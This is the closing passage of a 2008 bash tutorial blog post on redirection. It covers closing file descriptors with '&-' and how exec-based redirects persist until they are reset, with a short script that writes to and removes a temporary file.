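A non-zero status tells a script that the redirect failed, without having to parse the message itself.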

If you want to return a non-standard stream to its default (closed) state, redirect it to “&-”, like this:

[rechosen@localhost ~]$ ps aux 3>&1 1>&2 2>&3 3>&- | grep init

Note that redirections specified on a command only last for that command; afterwards, the streams are back in their initial state. You’ll only need to reset them manually if you made the redirect using, for example, exec, as redirects made this way last until changed manually.
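
The difference can be seen in a short sketch. Descriptor 4 and the temporary file are arbitrary choices for illustration; 4 is used instead of 3 only to stay out of the way of anything else that might already use 3.

```shell
log=$(mktemp)

# exec with nothing but a redirect changes the current shell itself:
# descriptor 4 now stays open on the file for all following commands.
exec 4> "$log"
echo "first" >&4
echo "second" >&4

# Redirects made with exec last until changed manually, so close it.
exec 4>&-

contents=$(cat "$log")

# After closing, writing to descriptor 4 fails again.
if ( echo "third" >&4 ) 2> /dev/null; then
  still_open=yes
else
  still_open=no
fi

rm -f "$log"
```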

Final words

Well, I hope you learned a lot from this tutorial. If the things you read here were new to you, don’t worry if you can’t apply them immediately. It is already useful if you just know what a statement means when you stumble upon it sometime. If you liked this, please help spread the word about this blog by posting a link to it here and there. Thank you for reading, and good luck working with bash!

April 27th, 2008 - Posted in tutorials
